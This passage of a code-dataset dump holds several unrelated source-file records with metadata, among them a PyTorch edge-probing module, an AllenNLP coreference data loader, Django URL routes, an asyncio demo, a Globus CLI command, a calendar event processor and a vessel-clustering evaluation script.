ValueError(\"Unsupported loss type '%s' \"\n \"for edge probing.\" % loss_type)\n\n def compute_loss(self, logits: torch.Tensor,\n labels: torch.Tensor, task: EdgeProbingTask):\n \"\"\" Compute loss & eval metrics.\n\n Expect logits and labels to be already \"selected\" for good targets,\n i.e. this function does not do any masking internally.\n\n Args:\n logits: [total_num_targets, n_classes] Tensor of float scores\n labels: [total_num_targets, n_classes] Tensor of sparse binary targets\n\n Returns:\n loss: scalar Tensor\n \"\"\"\n binary_preds = logits.ge(0).long() # {0,1}\n\n # Matthews coefficient and accuracy computed on {0,1} labels.\n task.mcc_scorer(binary_preds, labels.long())\n task.acc_scorer(binary_preds, labels.long())\n\n # F1Measure() expects [total_num_targets, n_classes, 2]\n # to compute binarized F1.\n binary_scores = torch.stack([-1 * logits, logits], dim=2)\n task.f1_scorer(binary_scores, labels)\n\n if self.loss_type == 'sigmoid':\n return F.binary_cross_entropy(torch.sigmoid(logits),\n labels.float())\n else:\n raise ValueError(\"Unsupported loss type '%s' \"\n \"for edge probing.\" % self.loss_type)\n", "sub_path": "src/modules/edge_probing.py", "file_name": "edge_probing.py", "file_ext": "py", "file_size_in_byte": 9712, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "allennlp.modules.span_extractors.SelfAttentiveSpanExtractor", "line_number": 43, "usage_type": "call"}, {"api_name": "allennlp.modules.span_extractors.EndpointSpanExtractor", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.Conv1d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tasks.edge_probing.EdgeProbingTask", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 152, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 176, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.unbind", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 191, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 177, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 194, "usage_type": "attribute"}, {"api_name": "torch.sigmoid", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 210, "usage_type": "attribute"}, {"api_name": "tasks.edge_probing.EdgeProbingTask", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 235, "usage_type": "call"}]}
+{"seq_id": "643663724", "text": "from typing import List, Dict, Union, Iterator\nimport random\nfrom copy import deepcopy\n\nimport torch\nfrom torch.utils import data\n\nfrom allennlp.common.registrable import Registrable\nfrom allennlp.common.lazy import Lazy\nfrom allennlp.data import Token, Vocabulary\nfrom allennlp.data.fields import TextField, SpanField, ListField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.batch import Batch\nfrom allennlp.data.samplers import Sampler, BatchSampler\nfrom allennlp.data.dataloader import allennlp_collate, TensorDict, DataLoader\n\n\ndef sentence_removal_collate(vocab: Vocabulary, instances: List[Instance], probability_of_modified_text: float = 1) -> TensorDict:\n augmented_instances = []\n for instance in instances:\n sentences = instance[\"metadata\"][\"sentences\"]\n removed_sentence_index = random.randint(0, len(sentences)-1)\n removed_sentence_length = len(sentences[removed_sentence_index])\n modified_sentences = sentences[:removed_sentence_index]+sentences[removed_sentence_index+1:]\n words = [Token(word) for sentence in modified_sentences for word in sentence]\n sentence_index_span_map = instance[\"metadata\"][\"sentence_index_span_map\"]\n spans = [span for sent_index in range(removed_sentence_index) for span in sentence_index_span_map[sent_index]]+[(span[0]-removed_sentence_length, span[1]-removed_sentence_length) for sent_index in range(removed_sentence_index+1, len(sentences)) for span in sentence_index_span_map[sent_index]]\n if len(spans) > 0 and len(sentences) > 1 and random.random() < probability_of_modified_text:\n instance.add_field(\"modified_text\", TextField(words, instance[\"text\"]._token_indexers))\n spans = [SpanField(span[0], span[1], instance[\"modified_text\"]) for span in spans]\n instance.add_field(\"modified_spans\", ListField(spans))\n instance[\"metadata\"].metadata[\"removed_text_start\"] = sum(len(s) for s in sentences[:removed_sentence_index])\n instance[\"metadata\"].metadata[\"removed_text_end\"] = instance[\"metadata\"].metadata[\"removed_text_start\"]+removed_sentence_length\n instance[\"metadata\"].metadata[\"modified_span_indices\"] = [i for i in range(len(instance[\"spans\"].field_list)) if instance[\"spans\"].field_list[i].span_start < instance[\"metadata\"].metadata[\"removed_text_start\"] or instance[\"spans\"].field_list[i].span_start >= instance[\"metadata\"].metadata[\"removed_text_end\"]]\n instance[\"modified_text\"].index(vocab)\n instance[\"metadata\"].metadata[\"modified_text_loss\"] = True\n augmented_instances.append(instance)\n instance2 = deepcopy(instance)\n instance2[\"metadata\"].metadata[\"modified_text_loss\"] = False\n augmented_instances.append(instance2)\n else:\n instance.add_field(\"modified_text\", instance[\"text\"])\n instance.add_field(\"modified_spans\", instance[\"spans\"])\n instance[\"metadata\"].metadata[\"modified_span_indices\"] = list(range(len(instance[\"spans\"].field_list)))\n instance[\"metadata\"].metadata[\"modified_text_loss\"] = True\n augmented_instances.append(instance)\n\n batch = Batch(augmented_instances)\n return batch.as_tensor_dict(batch.get_padding_lengths())\n\n\n@DataLoader.register(\"coref_dataloader\", constructor=\"from_partial_objects\")\nclass CorefDataLoader(data.DataLoader, DataLoader):\n \"\"\"\n A registrable version of the pytorch\n [DataLoader](https://pytorch.org/docs/stable/data.html#torch.utils.data.DataLoader).\n Firstly, this class exists is so that we can construct a DataLoader\n from a configuration file and have a different default `collate_fn`.\n You can use this class directly in python code, but it is identical to using\n pytorch dataloader with allennlp's custom collate function:\n\n ```\n from torch.utils.data import DataLoader\n\n from allennlp.data import allennlp_collate\n # Construct a dataloader directly for a dataset which contains allennlp\n # Instances which have _already_ been indexed.\n my_loader = DataLoader(dataset, batch_size=32, collate_fn=allennlp_collate)\n ```\n\n Secondly, this class adds a `batches_per_epoch` parameter which, if given, determines the number\n of batches after which an epoch ends. If this is `None`, then an epoch is set to be one full pass\n through your data. You might use this if you have a very large dataset and want more frequent\n checkpoints and evaluations on validation data, for instance.\n\n In a typical AllenNLP configuration file, the `dataset` parameter does not get an entry under\n the \"data_loader\", it gets constructed separately.\n \"\"\"\n\n def __init__(\n self,\n dataset: data.Dataset,\n batch_size: int = 1,\n shuffle: bool = False,\n sampler: Sampler = None,\n batch_sampler: BatchSampler = None,\n num_workers: int = 0,\n # NOTE: The default for collate_fn is different from the normal `None`.\n # We assume that if you are using this class you are using an\n # allennlp dataset of instances, which would require this.\n collate_fn=sentence_removal_collate,\n pin_memory: bool = False,\n drop_last: bool = False,\n timeout: int = 0,\n worker_init_fn=None,\n multiprocessing_context: str = None,\n batches_per_epoch: int = None,\n probability_of_modified_text: float = 1\n ):\n collate_fn = lambda x: sentence_removal_collate(vocab=batch_sampler.vocab, instances=x, probability_of_modified_text=probability_of_modified_text)\n super().__init__(\n dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n sampler=sampler,\n batch_sampler=batch_sampler,\n num_workers=num_workers,\n collate_fn=collate_fn,\n pin_memory=pin_memory,\n drop_last=drop_last,\n timeout=timeout,\n worker_init_fn=worker_init_fn,\n multiprocessing_context=multiprocessing_context,\n )\n self._data_generator = super().__iter__()\n self._batches_per_epoch = batches_per_epoch\n\n def __len__(self):\n if self._batches_per_epoch is not None:\n return self._batches_per_epoch\n return super().__len__()*2\n\n def slice_dict(self, dictionary, slice_index, slice_size):\n slice_dictionary = {}\n for key in dictionary:\n if isinstance(dictionary[key], Dict):\n field_slice = self.slice_dict(dictionary[key], slice_index, slice_size)\n else:\n field_slice = dictionary[key][slice_index:slice_index+slice_size]\n slice_dictionary[key] = field_slice\n return slice_dictionary\n\n def __iter__(self):\n if self._batches_per_epoch is None:\n # NOTE: since torch's DataLoader is listed as the first super class of this class,\n # super().__iter__() will resolve to the __iter__ method from torch's DataLoader,\n # which is what we want.\n # yield from super().__iter__()\n iterator = super().__iter__()\n for batch in iterator:\n arbitrary_key = None\n for key in batch:\n if not isinstance(batch[key], Dict):\n arbitrary_key = key\n batch_length = len(batch[arbitrary_key])\n for i in range(0, batch_length, 1):\n smaller_batch = self.slice_dict(batch, i, 1)\n yield smaller_batch\n else:\n for i in range(self._batches_per_epoch):\n try:\n yield next(self._data_generator)\n except StopIteration: # data_generator is exhausted\n self._data_generator = super().__iter__() # so refresh it\n yield next(self._data_generator) # and yield required instance\n\n @classmethod\n def from_partial_objects(\n cls,\n dataset: data.Dataset,\n batch_size: int = 1,\n shuffle: bool = False,\n sampler: Lazy[Sampler] = None,\n batch_sampler: Lazy[BatchSampler] = None,\n num_workers: int = 0,\n pin_memory: bool = False,\n drop_last: bool = False,\n timeout: int = 0,\n worker_init_fn=None,\n multiprocessing_context: str = None,\n batches_per_epoch: int = None,\n probability_of_modified_text: float = 1,\n ) -> \"CorefDataLoader\":\n batch_sampler_ = (\n None if batch_sampler is None else batch_sampler.construct(data_source=dataset)\n )\n sampler_ = None if sampler is None else sampler.construct(data_source=dataset)\n batch_size = batch_sampler_.batch_size\n\n return cls(\n dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n sampler=sampler_,\n batch_sampler=batch_sampler_,\n num_workers=num_workers,\n # NOTE: The default for collate_fn is different from the normal `None`.\n # We assume that if you are using this class you are using an\n # allennlp dataset of instances, which would require this.\n collate_fn=sentence_removal_collate,\n pin_memory=pin_memory,\n drop_last=drop_last,\n timeout=timeout,\n worker_init_fn=worker_init_fn,\n multiprocessing_context=multiprocessing_context,\n batches_per_epoch=batches_per_epoch,\n probability_of_modified_text=probability_of_modified_text\n )\n", "sub_path": "allennlp_models/coref/coref_dataloader.py", "file_name": "coref_dataloader.py", "file_ext": "py", "file_size_in_byte": 9582, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "allennlp.data.Vocabulary", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "allennlp.data.instance.Instance", "line_number": 18, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "allennlp.data.Token", "line_number": 25, "usage_type": "call"}, {"api_name": "random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "allennlp.data.fields.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "allennlp.data.fields.SpanField", "line_number": 30, "usage_type": "call"}, {"api_name": "allennlp.data.fields.ListField", "line_number": 31, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 38, "usage_type": "call"}, {"api_name": "allennlp.data.batch.Batch", "line_number": 48, "usage_type": "call"}, {"api_name": "allennlp.data.dataloader.TensorDict", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 53, "usage_type": "name"}, {"api_name": "allennlp.data.dataloader.DataLoader", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 82, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.Sampler", "line_number": 85, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.BatchSampler", "line_number": 86, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 126, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 143, "usage_type": "argument"}, {"api_name": "torch.utils.data.Dataset", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 160, "usage_type": "name"}, {"api_name": "allennlp.common.lazy.Lazy", "line_number": 163, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.Sampler", "line_number": 163, "usage_type": "name"}, {"api_name": "allennlp.common.lazy.Lazy", "line_number": 164, "usage_type": "name"}, {"api_name": "allennlp.data.samplers.BatchSampler", "line_number": 164, "usage_type": "name"}, {"api_name": "allennlp.data.dataloader.DataLoader.register", "line_number": 52, "usage_type": "call"}, {"api_name": "allennlp.data.dataloader.DataLoader", "line_number": 52, "usage_type": "name"}]}
+{"seq_id": "580499907", "text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'catalog'\n\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n\n url(r'^books/$', views.BookListView.as_view(), name=\"books-list\"),\n url(r'^book/(?P\\d{1,6})$', views.BookDetailView.as_view(), name=\"book-detail\"),\n url(r'^book/create$', views.BookCreate.as_view(), name='book-create'),\n url(r'^book/(?P\\d{1,6})/update$', views.BookUpdate.as_view(), name='book-update'),\n url(r'^book/(?P\\d{1,6})/delete$', views.BookDelete.as_view(), name='book-delete'),\n url(r'^book/(?P[-0-9a-f]{36})/renew$', views.renew_book_librarian, name=\"renew-book-librarian\"),\n\n url(r'^authors/$', views.AuthorListView.as_view(), name=\"authors-list\"),\n url(r'^author/(?P\\d{1,6})$', views.AuthorDetailView.as_view(), name=\"author-detail\"),\n url(r'^author/create$', views.AuthorCreate.as_view(), name='author-create'),\n url(r'^author/(?P\\d{1,6})/update$', views.AuthorUpdate.as_view(), name='author-update'),\n url(r'^author/(?P\\d{1,6})/delete$', views.AuthorDelete.as_view(), name='author-delete'),\n\n url(r'^mybooks/$', views.LoanedBooksByUserListView.as_view(), name=\"user-loaned\"),\n\n url(r'^all-loans/$', views.AllLoanedBooks.as_view(), name=\"all-loaned\"),\n]\n", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1272, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "102510520", "text": "#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n\n\nimport threading \nimport asyncio \n\n\ndef wget(host):\n\tprint ('hello world %s' % host)\n\tyield from asyncio.sleep(1)\n\tprint ('hello angin(%s)' % threading.currentThread())\n\n\nw_list=['www.163.com','www.sohu.com','www.sina.com']\nloop = asyncio.get_event_loop()\ntasks = [wget(host) for host in w_list]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\n\n\n", "sub_path": "stu_lxf_python/generator/coroutine_web.py", "file_name": "coroutine_web.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "asyncio.sleep", "line_number": 12, "usage_type": "call"}, {"api_name": "threading.currentThread", "line_number": 13, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 17, "usage_type": "call"}, {"api_name": "asyncio.wait", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "247191859", "text": "import click\nfrom globus_sdk import TransferAPIError\n\nfrom globus_cli.parsing import common_options\nfrom globus_cli.safeio import formatted_print\nfrom globus_cli.services.transfer import (\n display_name_or_cname,\n get_client,\n iterable_response_to_dict,\n)\n\n\n@click.command(\"list\", help=\"List bookmarks for the current user\")\n@common_options\ndef bookmark_list():\n \"\"\"\n Executor for `globus bookmark list`\n \"\"\"\n client = get_client()\n\n bookmark_iterator = client.bookmark_list()\n\n def get_ep_name(item):\n ep_id = item[\"endpoint_id\"]\n try:\n ep_doc = client.get_endpoint(ep_id)\n return display_name_or_cname(ep_doc)\n except TransferAPIError as err:\n if err.code == \"EndpointDeleted\":\n return \"[DELETED ENDPOINT]\"\n else:\n raise err\n\n formatted_print(\n bookmark_iterator,\n fields=[\n (\"Name\", \"name\"),\n (\"Bookmark ID\", \"id\"),\n (\"Endpoint ID\", \"endpoint_id\"),\n (\"Endpoint Name\", get_ep_name),\n (\"Path\", \"path\"),\n ],\n response_key=\"DATA\",\n json_converter=iterable_response_to_dict,\n )\n", "sub_path": "globus_cli/commands/bookmark/list.py", "file_name": "list.py", "file_ext": "py", "file_size_in_byte": 1194, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "globus_cli.services.transfer.get_client", "line_number": 19, "usage_type": "call"}, {"api_name": "globus_cli.services.transfer.display_name_or_cname", "line_number": 27, "usage_type": "call"}, {"api_name": "globus_sdk.TransferAPIError", "line_number": 28, "usage_type": "name"}, {"api_name": "globus_cli.safeio.formatted_print", "line_number": 34, "usage_type": "call"}, {"api_name": "globus_cli.services.transfer.iterable_response_to_dict", "line_number": 44, "usage_type": "name"}, {"api_name": "click.command", "line_number": 13, "usage_type": "call"}, {"api_name": "globus_cli.parsing.common_options", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "317690675", "text": "from cal.models import CFPBCalendar, CFPBCalendarEvent\nfrom datetime import date, datetime\n\nclass ProcessEvent(object):\n\n # pass in an icalendar event and the calendar table that was queried\n def __init__(self, event ,calendar_record):\n self.event = event\n\n self.e = CFPBCalendarEvent()\n\n self.e.calendar = calendar_record\n\n self.num_dupes = 0\n\n self.saved_event = False\n\n self._process()\n\n # get rid of unicode and formatting issues\n def _clean_string(self,s):\n\n s = s.encode('ascii', 'ignore')\n s = str(s).replace('\\\\n', '').replace('\\\\,', ',')\n\n return s\n\n # convert the datetime to string and remove any timezone info\n def _clean_date(self,d):\n\n d = str(d).replace('Z', '')\n d = d.encode('ascii', 'ignore')\n d = d.split(\"+\")[0]\n\n return d\n\n # figure out if this event is assigned for all day\n def _is_all_day(self):\n\n start = datetime.strptime(self.e.dtstart.split(\" \")[0], \"%Y-%m-%d\")\n end = datetime.strptime(self.e.dtend.split(\" \")[0], \"%Y-%m-%d\")\n\n diff = start - end\n\n all_day = (diff.days == -1)\n\n setattr(self.e, \"all_day\", all_day)\n\n # dynamically set the value of the calendar object from the event data\n def _set_value(self, i):\n\n if i in ('DTSTART', 'DTEND', 'DTSTAMP', 'CREATED'):\n v = self._clean_date( self.event.decoded(i) )\n\n elif i in ('DESCRIPTION', 'SUMMARY', 'LOCATION'):\n v = self._clean_string(self.event[i])\n\n else:\n v = self.event[i]\n\n setattr(self.e, i.lower(), v)\n\n # make sure uid is unqiue - this is do to recurring events sharing the same uid\n def _create_unique_id(self):\n\n temp = str(self.e.uid)+'@'+str(self.e.dtstart).replace(\" \",\"\").replace(\":\",\"\").replace(\"-\",\"\")\n\n self.e.uid=temp\n\n # let the magic happen\n def _process(self):\n\n for i in self.event.keys():\n self._set_value(i)\n\n if self.e.summary == None:\n summary_fill = CFPBCalendarEvent.objects.filter(uid__contains=self.e.uid ) #uid=self.e.uid, summary__isnull=False)\n\n if summary_fill:\n self.e.summary = summary_fill[0].summary\n\n if self.e.dtstamp == None:\n self.e.dtstamp = self._clean_date(self.event.decoded(\"RECURRENCE-ID\"))\n\n if self.e.location == None:\n self.e.location = \" \"\n\n self._is_all_day()\n\n self._create_unique_id()\n\n dupes = CFPBCalendarEvent.objects.filter(uid=self.e.uid, dtstamp=self.e.dtstamp)\n\n self.num_dupes = len(dupes)\n\n def save(self):\n if self.num_dupes == 0:\n self.e.save()\n self.saved_event = True", "sub_path": "cfgov/cal/event.py", "file_name": "event.py", "file_ext": "py", "file_size_in_byte": 2724, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cal.models.CFPBCalendarEvent", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "name"}, {"api_name": "cal.models.CFPBCalendarEvent.objects.filter", "line_number": 77, "usage_type": "call"}, {"api_name": "cal.models.CFPBCalendarEvent.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "cal.models.CFPBCalendarEvent", "line_number": 77, "usage_type": "name"}, {"api_name": "cal.models.CFPBCalendarEvent.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "cal.models.CFPBCalendarEvent.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cal.models.CFPBCalendarEvent", "line_number": 92, "usage_type": "name"}]}
+{"seq_id": "628824441", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript to evaluate prediction accuracy\r\n\r\n@author: Kevin S. Xu\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import adjusted_rand_score\r\n\r\nfrom utils import loadData, plotVesselTracks\r\nfrom predictVessel import predictWithK, predictWithoutK\r\n\r\n#%% Load training and test data. Training data may not necessarily be used.\r\ntestData = loadData('set2noVID.csv')\r\ntestFeatures = testData[:,2:]\r\ntestLabels = testData[:,1]\r\ntrainData = loadData('set1.csv')\r\ntrainFeatures = trainData[:,2:]\r\ntrainLabels = trainData[:,1]\r\n\r\n#%% Run prediction algorithms and check accuracy\r\nnumVessels = np.unique(testLabels).size\r\npredVesselsWithK = predictWithK(testFeatures, numVessels, trainFeatures, \r\n trainLabels)\r\n# Check to ensure that there are at most K vessels. If not, set adjusted\r\n# Rand index to -infinity to indicate an invalid result (0 accuracy score)\r\nif np.unique(predVesselsWithK).size > numVessels:\r\n ariWithK = -np.inf\r\nelse:\r\n ariWithK = adjusted_rand_score(testLabels, predVesselsWithK)\r\n\r\npredVesselsWithoutK = predictWithoutK(testFeatures, trainFeatures, trainLabels)\r\npredNumVessels = np.unique(predVesselsWithoutK).size\r\nariWithoutK = adjusted_rand_score(testLabels, predVesselsWithoutK)\r\n\r\nprint(f'Adjusted Rand index given K = {numVessels}: {ariWithK}')\r\nprint(f'Adjusted Rand index for estimated K = {predNumVessels}: '\r\n + f'{ariWithoutK}')\r\n\r\n#%% Plot vessel tracks colored by prediction and actual labels\r\nplt.ion()\r\nplotVesselTracks(testFeatures[:,[2,1]], predVesselsWithK)\r\nplt.title('Vessel tracks by cluster with K')\r\nplotVesselTracks(testFeatures[:,[2,1]], predVesselsWithoutK)\r\nplt.title('Vessel tracks by cluster without K')\r\nplotVesselTracks(testFeatures[:,[2,1]], testLabels)\r\nplt.title('Vessel tracks by label')\r\n", "sub_path": "evaluatePredictor.py", "file_name": "evaluatePredictor.py", "file_ext": "py", "file_size_in_byte": 1843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.loadData", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.loadData", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 24, "usage_type": "call"}, {"api_name": "predictVessel.predictWithK", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.adjusted_rand_score", "line_number": 32, "usage_type": "call"}, {"api_name": "predictVessel.predictWithoutK", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.metrics.adjusted_rand_score", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "utils.plotVesselTracks", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.plotVesselTracks", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "utils.plotVesselTracks", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]}
+{"seq_id": "636551162", "text": "import os\n\nfrom setuptools import setup\n\ninstall_requires = []\n\nREADME_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'README')\n\ndescription = 'Django specific cookie implementation compliant with Dutch law, use at your own risk.'\n\nif os.path.exists(README_PATH):\n long_description = open(README_PATH).read()\nelse:\n long_description = description\n\npackages, data_files = [], []\nroot_dir = os.path.dirname(__file__)\nif root_dir:\n os.chdir(root_dir)\n\nfor dirpath, dirnames, filenames in os.walk('cookie_law'):\n # Ignore dirnames that start with '.'\n for i, dirname in enumerate(dirnames):\n if dirname.startswith('.'): del dirnames[i]\n if '__init__.py' in filenames:\n pkg = dirpath.replace(os.path.sep, '.')\n if os.path.altsep:\n pkg = pkg.replace(os.path.altsep, '.')\n packages.append(pkg)\n elif filenames:\n prefix = dirpath[11:] # Strip \"cookie_law/\"\n for f in filenames:\n data_files.append(os.path.join(prefix, f))\n\n\n\nsetup(\n name='django-cookie-law-nl',\n version='0.2.1',\n install_requires=install_requires,\n include_package_data=True,\n description=description,\n long_description=long_description,\n author='Wouter Lansu',\n author_email='wfrlansu@gmail.com',\n url='https://bitbucket.org/getlogic/lib_django_cookie_law',\n packages=packages,\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python\",\n \"Framework :: Django\",\n \"Topic :: Internet\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Intended Audience :: Developers\",\n ],\n)\n", "sub_path": "pypi_install_script/django-cookie-law-nl-0.2.1.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 19, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "193820270", "text": "# \turls.py\n# \tCopyright (C) 2012 David Yamnitsky\n# \t\n# \tPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation \n# \tfiles (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, \n# \tmodify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the \n# \tSoftware is furnished to do so, subject to the following conditions:\n# \t\n# \tThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n# \t\n# \tTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE \n# \tWARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS \n# \tOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR \n# \tOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nfrom django.http import HttpResponse\nfrom django.conf.urls import patterns, url, include\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nimport settings\n\nhandler500 = 